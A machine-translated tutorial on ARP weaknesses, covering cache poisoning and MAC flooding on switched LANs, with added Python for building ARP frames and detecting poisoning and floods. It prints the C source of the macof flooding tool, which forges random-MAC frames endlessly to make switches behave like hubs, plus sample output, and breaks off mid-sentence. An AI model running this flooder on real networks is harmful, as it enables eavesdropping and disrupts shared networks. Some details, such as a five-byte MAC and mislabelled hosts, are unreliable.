Attack and Defense Tactics: Close Combat with ARP Attacks

Source: Internet
Author: User

In the Internet era, hackers are a group of mysterious people in our lives. Legend has it that they are arrogant, self-promoting and strange in their ways, stirring the lifeblood of the entire network and keeping it alive. In reality, however, they live beyond our boundaries. Imagine a busy office in which every employee is immersed in his or her own affairs in a narrow workspace; the only sounds are fingers drumming on keyboards and phones ringing one after another. Who notices that, inside one of those narrow personal spaces, something beyond ordinary imagination is going on: fast fingers, a parade of commands and running program queues. On the surface everything seems normal, yet an intense electronic confrontation may be under way.......

According to SANS, in 2001 internal intrusions accounted for only about 30% of attacks, but they were also the most harmful. Therefore, local area network intrusion and penetration are the more practical concern, and the various attack methods built on the ARP weakness at the layer-2 link are undoubtedly the most exquisite stunt of local network warfare.

I. Basic Knowledge

Behind an exquisite program lie simple principles. In order to explain the ARP protocol's weaknesses and the various ARP attack ideas covered later (while also taking into account readers who are new to networking), we first give a rough overview of the ARP protocol and the related link-layer concepts.

Address Resolution Protocol (ARP) binds the hardware address of an Ethernet card to an IP address. When hosts need to communicate, ARP establishes the link between them through a broadcast request and a unicast response. You are familiar with 32-bit IP addresses; in an Ethernet LAN, the address of the NIC itself is 48 bits long (the MAC address). A table called the ARP cache maintains the correlation between MAC addresses and their corresponding IP addresses. ARP provides the protocol rules for translating addresses between network devices and for creating these MAC-IP correlations.

The principle for establishing a communication relationship at the link layer: network host A wants to communicate with network host C, so host A broadcasts an ARP request packet (REQUEST) on the network:

Host A wants to communicate with the target host whose IP address is 192.168.1.3. The broadcast packet it sends contains its own IP address, the MAC address of its NIC, the IP address of the target host, and the broadcast MAC address (FF-FF-FF-FF-FF-FF).

(Note: the MAC address is the address used at the media access control layer; intuitively, it is the physical address of the NIC. A MAC address is normally 6 bytes, that is, 48 bits.)

When host C receives the ARP REQUEST broadcast, it finds that the target IP address in the packet matches its own IP address, accepts the request, and responds.

From figure 2 we can see that host C, having found that host A's ARP request is meant for it, adds the IP-MAC binding record of host A to its own ARP cache table and sends a unicast ARP response packet (REPLY) to host A. Host A receives the response, updates its ARP cache table, and binds the IP-MAC record of host C. Now the layer-2 communication relationship is established. The other hosts on the network ignore the request packet.

This exchange can be pictured as a short conversation:

Host A: Hi, who has the IP address 192.168.1.3?

Host B: Hi, my host address is 192.168.1.3, and my house number is 00-50-56-C0-08. Remember to come to me.

Other hosts: No, that is not my IP address.

From the analysis of its principle, ARP is a stateless protocol that carries no state information, so it cannot perform any authentication; this is the root of the protocol's security threat. The historical cause is that the early network designers created ARP in a peaceful and open environment, where security problems were almost trivial. However, the growth of networks and the rise of destructive attacks and intrusion incidents have left ARP vulnerable.

After understanding how ARP works, we can conclude that the ARP cache in most network systems dynamically adds or updates the IP-MAC mapping records in its table based on the ARP reply packets it receives. Out of such a simple rule come the various brilliant intrusion and attack techniques we will see next.
 

II. Attack Classification

◆ ARP cache poisoning

This is a very interesting term, "poisoning"; it reminds me of mouldy green air and rust-red rivers. After all, is the ecological environment of the Earth not worrying?

The essence of ARP cache poisoning is not as terrible as the word suggests. Recall the ARP cache table introduced earlier: in fact, every network device has an ARP table that temporarily records the matched MAC-IP address pairs. It ensures that these records are unique, that is, one IP maps to only one MAC. ARP itself has no authentication or trust mechanism, so spoofing becomes rampant. When a network device sends an ARP request, it fully trusts that the ARP reply comes from the correct device, because it cannot verify whether the response packet was really sent by that device. Even worse, many operating systems accept ARP reply packets sent by other devices without ever having sent an ARP request.

In this way, a spoofing method turns into an intrusion, and the defense is helpless. If I were a black hat who knows that ARP does not validate and that the system accepts ARP replies without having sent a request, what would I do? Create a seemingly valid ARP reply packet that carries the MAC address and IP address I want, and send it to the host that blindly accepts such packets. The host is spoofed into updating its cache with the MAC-IP mapping pair I chose. Of course, I can also broadcast this ARP REPLY packet freely to fool every host on the network.

Now you know a small ARP trick; we call it ARP cache poisoning. Countless inventions have been built on it, just as the invention of the wheel compares with the moon landing: a simple invention can leap across the Earth.
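As an added example (not part of the original article), the following Python builds the request and reply frames of the exchange in section I and models one host's ARP cache together with the two checks a defender would log for the poisoning described above: a reply that answers no outstanding request, and a known IP whose MAC changes. Hosts A and C, their MACs, and A's address 192.168.1.1 are constructed values.

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
REQUEST, REPLY = 1, 2            # ARP opcodes (RFC 826)

def _mac(s): return bytes.fromhex(s.replace(":", ""))
def _ip(s): return bytes(int(o) for o in s.split("."))
def _mac_str(b): return ":".join(f"{x:02x}" for x in b)
def _ip_str(b): return ".".join(str(x) for x in b)

def build_arp(op, sha, spa, tha, tpa):
    """Ethernet II frame carrying one ARP packet. A request goes to the
    broadcast MAC, a reply is unicast back to the requester (tha)."""
    dst = BROADCAST if op == REQUEST else tha
    eth = _mac(dst) + _mac(sha) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    return eth + arp + _mac(sha) + _ip(spa) + _mac(tha) + _ip(tpa)

def parse_arp(frame):
    """ARP fields of a frame, or None if it is not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    if struct.unpack("!HHBB", frame[14:20]) != (1, 0x0800, 6, 4):
        return None
    return {"dst": _mac_str(frame[0:6]), "op": struct.unpack("!H", frame[20:22])[0],
            "sha": _mac_str(frame[22:28]), "spa": _ip_str(frame[28:32]),
            "tha": _mac_str(frame[32:38]), "tpa": _ip_str(frame[38:42])}

class ArpMonitor:
    """One host's ARP cache, updated on every reply as the article describes,
    plus two checks worth logging: unsolicited replies and IP->MAC changes."""
    def __init__(self):
        self.cache, self.pending, self.alerts = {}, set(), []

    def send_request(self, tpa):
        self.pending.add(tpa)            # remember which IP we asked about

    def receive(self, frame):
        p = parse_arp(frame)
        if p is None or p["op"] != REPLY:
            return
        ip, mac = p["spa"], p["sha"]
        if ip in self.cache and self.cache[ip] != mac:
            self.alerts.append(f"{ip} changed {self.cache[ip]} -> {mac}")
        if ip not in self.pending:
            self.alerts.append(f"unsolicited reply: {ip} is-at {mac}")
        self.pending.discard(ip)
        self.cache[ip] = mac             # naive update rule the poisoner relies on
```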

◆ MAC Flooding Attack

Most current networks use a switched structure instead of the old broadcast structure. The advantage is that a switch does not push broadcast traffic to every port; it intelligently identifies the port that needs to receive the data, which leaves a layer-2 sniffer attached the way it would be to a hub with nothing to see.

However, the power of progress sometimes makes "security" very delicate. A switch's port security feature consumes some CPU resources, and when the switching load exceeds what it can handle, the switch can no longer enforce port security. It then falls back to hub mode: data is simply broadcast to every computer on the network, and eavesdropping can continue. Therefore, a large number of forged ARP request packets can be used to flood the switch's ARP table (a typical application of ARP cache table poisoning), which easily overloads the switches of many manufacturers (the CISCO 1900 and 3COM SuperStack II are vulnerable). At that moment the switch works like a hub, and a packet sniffer can easily observe the entire network.
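Added example, not from the article or from dsniff: a per-port detector for the address-table flooding described above. It counts distinct source MACs seen on a port inside a sliding window, which is the signal a switch monitor or a span-port sensor would alarm on; the port name and the frames are constructed.

```python
import os
from collections import defaultdict

def src_mac(frame):
    """Source MAC of an Ethernet II frame as colon-separated hex."""
    return ":".join(f"{b:02x}" for b in frame[6:12])

class MacFloodDetector:
    """Per-port count of distinct source MACs seen inside a sliding window.
    An access port normally learns a handful of addresses; an address-table
    flood such as macof presents thousands of new ones per second."""
    def __init__(self, window=1.0, threshold=100):
        self.window, self.threshold = window, threshold
        self.seen = defaultdict(dict)        # port -> {mac: last time seen}

    def observe(self, port, frame, now):
        """Record one frame; return True while the port exceeds the threshold."""
        macs = self.seen[port]
        macs[src_mac(frame)] = now
        for mac in [m for m, t in macs.items() if now - t > self.window]:
            del macs[mac]                    # age out MACs outside the window
        return len(macs) > self.threshold

def flood_frame():
    """Constructed frame with a random source MAC, as a flood tool produces."""
    return os.urandom(6) + os.urandom(6) + b"\x08\x00" + bytes(46)

if __name__ == "__main__":
    det = MacFloodDetector()
    for n in range(200):
        if det.observe("Gi0/1", flood_frame(), 0.0):
            print(f"flood detected on Gi0/1 after {n + 1} frames")
            break
```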

The macof applet implements this function with very little code; its implementation is as follows:
--------------- Snip -------------------
#include "config.h"
#include <sys/types.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <err.h>
#include <libnet.h>
#include <pcap.h>

#include "version.h"

extern char *ether_ntoa(struct ether_addr *);
extern struct ether_addr *ether_aton(char *);

in_addr_t Src = 0;
in_addr_t Dst = 0;
u_char *Tha = NULL;
u_short Dport = 0;
u_short Sport = 0;
char *Intf = NULL;
int Repeat = -1;        /* -1 makes the MAC-forging loop below run forever */

void
usage(void)
{
	fprintf(stderr, "Version: " VERSION "\n"
	        "Usage: macof\n");
	exit(1);
}

void
gen_mac(u_char *mac)
{
	/* Generate a random 48-bit MAC address: 32 random bits + 16 random bits */
	*(in_addr_t *)mac = libnet_get_prand(PRu32);
	*(u_short *)(mac + 4) = libnet_get_prand(PRu16);
}

int
main(int argc, char *argv[])
{
	int i;
	struct libnet_link_int *llif;
	char ebuf[PCAP_ERRBUF_SIZE];
	u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN];
	in_addr_t src, dst;
	u_short sport, dport;
	u_int32_t seq;
	u_char pkt[ETH_H + IP_H + TCP_H];

	/* Pick the default interface unless one was set, then open it for raw writes */
	if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL)
		errx(1, "%s", ebuf);
	if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0)
		errx(1, "%s", ebuf);

	libnet_seed_prand();

	for (i = 0; i != Repeat; i++) {
		gen_mac(sha);
		gen_mac(tha);
		src = libnet_get_prand(PRu32);
		dst = libnet_get_prand(PRu32);
		sport = libnet_get_prand(PRu16);
		dport = libnet_get_prand(PRu16);
		seq = libnet_get_prand(PRu32);

		/* Forge a seemingly valid MAC address on an Ethernet/IP/TCP SYN frame */
		libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt);
		libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64,
		    IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H);
		libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,
		    0, NULL, 0, pkt + ETH_H + IP_H);
		libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H);
		libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H);

		if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0)
			errx(1, "write");

		fprintf(stderr, "Source MAC address: %s ",
		    ether_ntoa((struct ether_addr *)sha));
		fprintf(stderr, "Target MAC address: %s\n"
		    "Source IP address/port: %s:%d Target IP address/port: %s:%d\n",
		    ether_ntoa((struct ether_addr *)tha),
		    libnet_host_lookup(Src, 0), sport,
		    libnet_host_lookup(Dst, 0), dport);
	}
	exit(0);
}
----------------- Snip end -----------------------------
 

/* The author of this program is Dug Song (dugsong@m.org). Because only the MAC flooding attack needs to be demonstrated here, I have simplified the program so that readers can intuitively understand the principle of the MAC FLOODING attack. In addition, macof was first written in Perl by Ian Vitek. */

# macof testing
[root@hackersvr /]# macof

Source MAC address: 77:6b:e1:6e:5e:8c Target MAC address: 93:2d:ed:45:f9:e3
Source IP address/port: 0.0.0.0:45702 Target IP address/port: 0.0.0.0:11000

Source MAC address: 84:a4:d3:57:ef:8 Target MAC address: 12:56:52:42:dc:95
Source IP address/port: 0.0.0.0:16630 Target IP address/port: 0.0.0.0:3031

Source MAC address: f0:9:3f:18:89 Target MAC address: 1d:86:53:53:d7:f8
Source IP address/port: 0.0.0.0:15535 Target IP address/port: 0.0.0.0:7466 ............

This program
